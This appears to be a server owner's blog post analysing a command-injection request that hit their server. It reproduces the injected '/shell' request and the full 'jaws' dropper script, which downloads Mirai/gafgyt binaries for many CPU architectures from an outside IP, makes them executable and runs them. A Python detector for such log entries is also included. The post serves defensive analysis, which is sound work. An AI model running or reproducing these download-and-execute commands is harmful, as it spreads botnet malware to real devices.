So, once upon a time, my server was visited by 91.92.244.94, which sent this HTTP request.
GET /shell?cd+/tmp;rm+-rf+*;wget+193.233.203.76/jaws;sh+/tmp/jaws HTTP/1.1
Change to /tmp, remove everything in it, download 193.233.203.76/jaws into it, then execute the downloaded file with sh.
Here is the content of the jaws file.
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; cat db0fa4b8db0333367e9bda3ab68b8042.mips > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; cat db0fa4b8db0333367e9bda3ab68b8042.mpsl > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; cat db0fa4b8db0333367e9bda3ab68b8042.arm > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; cat db0fa4b8db0333367e9bda3ab68b8042.arm5 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; cat db0fa4b8db0333367e9bda3ab68b8042.arm7 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; cat db0fa4b8db0333367e9bda3ab68b8042.ppc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; cat db0fa4b8db0333367e9bda3ab68b8042.m68k > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; cat db0fa4b8db0333367e9bda3ab68b8042.spc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; cat db0fa4b8db0333367e9bda3ab68b8042.i686 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; cat db0fa4b8db0333367e9bda3ab68b8042.sh4 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; cat db0fa4b8db0333367e9bda3ab68b8042.arc > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
Each line changes to a writable directory (/tmp, falling back to /var/run, /mnt, /root or /), downloads the binary built for one CPU architecture, copies it to 76d32be0, makes every file in the directory executable, then runs it with the "jaws.exploit" argument. Only the binary that matches the host's architecture will actually execute, so the script simply tries all of them in turn.
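As an added example (not part of the original post), here is a small Python detector for the two artifacts above: it decodes a request URI from a web access log, splits the injected query into shell commands and flags a download-and-execute chain, and it pulls the payload URLs out of a dropper script like jaws. The log lines are constructed around the request quoted above (Common Log Format, constructed timestamps), the dropper excerpt is two of the lines quoted above, and the fetch/execute command lists are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

FETCHERS = {"wget", "curl", "tftp", "ftpget"}   # commands that pull remote content (assumed list)
EXECUTORS = {"sh", "bash", "chmod"}              # commands that run, or make runnable, what was pulled
URL_RE = re.compile(r"^(?:https?://)?\d{1,3}(?:\.\d{1,3}){3}(?:/\S*)?$")  # bare-IP URLs, as botnets use
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

def split_commands(text):
    """Split a shell one-liner on ; && || | and newlines into argv-style token lists."""
    parts = re.split(r"\s*(?:;|&&|\|\||\||\n)\s*", text)
    return [p.split() for p in parts if p.strip()]

def fetched_urls(cmds):
    """URLs given as arguments to a download tool (wget/curl/...)."""
    return [tok for c in cmds if c[0] in FETCHERS for tok in c[1:] if URL_RE.match(tok)]

def analyse_uri(uri):
    """Decode the query part of a request URI ('+' and %XX) and look for fetch-then-execute."""
    query = unquote_plus(uri.split("?", 1)[1]) if "?" in uri else ""
    cmds = split_commands(query)
    verbs = {c[0] for c in cmds}
    fetch, execute = bool(verbs & FETCHERS), bool(verbs & EXECUTORS)
    # Downloading alone is a weak signal; downloading and then running it is the dropper pattern.
    return {"fetch": fetch, "execute": execute, "urls": fetched_urls(cmds), "suspicious": fetch and execute}

def scan_access_log(lines):
    """Return (client_ip, uri, payload_urls) for every log line whose query fetches and executes."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (r := analyse_uri(m["uri"]))["suspicious"]:
            hits.append((m["ip"], m["uri"], r["urls"]))
    return hits

def dropper_urls(script):
    """Unique payload URLs a dropper script downloads, in order of first appearance."""
    found = [u for line in script.splitlines() for u in fetched_urls(split_commands(line))]
    return list(dict.fromkeys(found))

# Constructed access log lines: the request from the post, then a fetch-only request for contrast.
SAMPLE_LOG = [
    '91.92.244.94 - - [01/Jan/2024:00:00:00 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+193.233.203.76/jaws;sh+/tmp/jaws HTTP/1.1" 404 162',
    '198.51.100.7 - - [01/Jan/2024:00:00:01 +0000] "GET /shell?wget+198.51.100.9/notes.txt HTTP/1.1" 404 162',
]
# Two of the per-architecture lines from the jaws dropper quoted in the post.
JAWS_EXCERPT = """\
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; curl -O http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; cat db0fa4b8db0333367e9bda3ab68b8042.mips > 76d32be0; chmod +x *; ./76d32be0 jaws.exploit
"""
```

Running `scan_access_log(SAMPLE_LOG)` flags only the 91.92.244.94 request, and `dropper_urls(JAWS_EXCERPT)` yields one URL per architecture even though each line fetches it twice (wget, then curl).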
For archival purposes, I already downloaded all those executables here.
I wish some security researchers could find out what these executables actually do.
http://193.233.203.76/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86
URL check: MIRAI
db0fa4b8db0333367e9bda3ab68b8042.x86
executable file SHA-256 hash check: trojan.mirai/gafgyt